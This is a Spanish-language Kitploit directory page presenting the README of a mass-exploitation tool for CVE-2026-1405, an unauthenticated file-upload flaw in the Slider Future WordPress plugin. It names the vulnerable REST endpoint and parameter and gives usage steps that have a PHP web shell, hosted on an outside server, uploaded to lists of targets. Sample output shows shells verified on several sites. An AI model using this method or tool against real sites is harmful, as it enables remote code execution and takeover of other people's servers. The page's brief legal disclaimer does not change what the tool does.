Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1405 — Slider Future <= 1.0.5 - Subida de archivos arbitraria no autenticada | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-1405
Generación de PayloadsExplotaciónScripting y AutomatizaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubnxploited/cve-2026-1405

CVE-2026-1405

Slider Future <= 1.0.5 - Subida de archivos arbitraria no autenticada

Ver Repositorio
41hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-1405

Slider Future <= 1.0.5 - Subida Arbitraria de Archivos sin Autenticación

🚀 CVE-2026-1405.py — Herramienta de Explotación Masiva de Slider Future

🩸 Resumen de la Vulnerabilidad

Componente: Slider Future (plugin de WordPress)
Versiones Afectadas: ≤ 1.0.5
Vulnerabilidad: Subida Arbitraria de Archivos sin Autenticación
CVE: CVE-2026-1405
Puntuación CVSS: 9.8 (Crítica)

El plugin Slider Future para WordPress es vulnerable a la subida arbitraria de archivos debido a la falta de validación del tipo de archivo en la función slider_future_handle_image_upload en todas las versiones hasta la 1.0.5 inclusive. Esto permite que atacantes no autenticados suban cualquier tipo de archivo, incluidos shells PHP maliciosos, directamente al servidor afectado, lo que habilita la ejecución remota de código.


⚡ Características del Exploit

  • Explotación masiva en múltiples objetivos.
  • Utiliza el endpoint vulnerable: /wp-json/slider-future/v1/upload-image/
  • Sube un shell PHP remoto mediante el parámetro image_url (no se requiere autenticación).
  • Verifica automáticamente la ejecución del shell comprobando firmas definidas por el usuario.

🛠️ Instrucciones de Uso

1. Prepare un archivo de texto con sus sitios WordPress objetivo (uno por línea):

root@kitploit:~
http://example1.com
https://example2.com
...

2. Aloje su shell PHP en línea y tenga lista su URL directa.

Ejemplo: http://yourserver.com/shell.php

3. Ejecute el script:

root@kitploit:~
python3 CVE-2026-1405.py

Se le solicitará:

  • Archivo de objetivos: Ruta a su lista de objetivos (por defecto: list.txt)
  • URL directa del shell: El shell en línea y accesible que desea subir a los objetivos
  • Firma del shell: Una cadena única en su shell para la verificación (p. ej. Nxploited)
  • Hilos: Número de hilos paralelos (por defecto: 10)

4. Salida

  • Los resultados del exploit se muestran en vivo en una interfaz profesional basada en Rich.
  • Los objetivos exitosos y las URL de shell se guardan automáticamente en success_results.txt.

📝 Detalles del Script

  • Nombre: CVE-2026-1405.py
  • Autor: Nxploited
  • Lenguaje: Python 3
  • Librerías: requests, rich

Cómo Funciona

  1. Envía una solicitud POST al endpoint vulnerable de cada objetivo:
    • URL: /wp-json/slider-future/v1/upload-image/
    • Parámetro: image_url que apunta a su shell.
  2. Analiza la respuesta JSON para extraer la URL del shell subido.
  3. Visita la URL del shell y busca su cadena de firma.
  4. Muestra el estado: éxito o fallo para cada objetivo.

⚠️ Aviso Legal

Esta herramienta es solo para fines de pruebas de seguridad educativas y autorizadas.
El uso no autorizado contra sitios que no posee o para los que no tiene permiso explícito de prueba es ilegal.


💡 Ejemplo de Salida

root@kitploit:~
Exploit For: CVE-2026-1405
By: Nxploited

Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited

2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt
Descargar herramienta